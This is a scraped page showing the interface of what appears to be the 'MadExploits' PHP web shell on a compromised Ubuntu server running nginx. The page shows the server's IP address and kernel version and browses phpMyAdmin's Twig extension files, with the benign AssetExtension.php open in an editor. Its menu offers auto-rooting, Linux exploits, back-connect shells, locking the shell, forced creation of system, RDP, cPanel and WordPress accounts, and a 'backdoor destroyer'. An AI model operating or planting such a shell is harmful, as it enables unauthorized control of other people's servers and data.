Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.159
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
phpmyadmin /
libraries /
classes /
Twig /
[ HOME SHELL ]
Name
Size
Permission
Action
AssetExtension.php
649
B
-rw-r--r--
CoreExtension.php
486
B
-rw-r--r--
FlashMessagesExtension.php
389
B
-rw-r--r--
I18nExtension.php
673
B
-rw-r--r--
MessageExtension.php
1.1
KB
-rw-r--r--
RelationExtension.php
1.17
KB
-rw-r--r--
SanitizeExtension.php
1.23
KB
-rw-r--r--
TableExtension.php
500
B
-rw-r--r--
TrackerExtension.php
523
B
-rw-r--r--
TransformationsExtension.php
711
B
-rw-r--r--
UrlExtension.php
1.17
KB
-rw-r--r--
UtilExtension.php
5.1
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : AssetExtension.php
<?php declare(strict_types=1); namespace PhpMyAdmin\Twig; use PhpMyAdmin\Theme; use Twig\Extension\AbstractExtension; use Twig\TwigFunction; final class AssetExtension extends AbstractExtension { /** * @return TwigFunction[] */ public function getFunctions() { return [ new TwigFunction('image', [$this, 'getImagePath']), ]; } public function getImagePath(?string $filename = null, ?string $fallback = null): string { global $theme; if (! $theme instanceof Theme) { return ''; } return $theme->getImgPath($filename, $fallback); } }
Close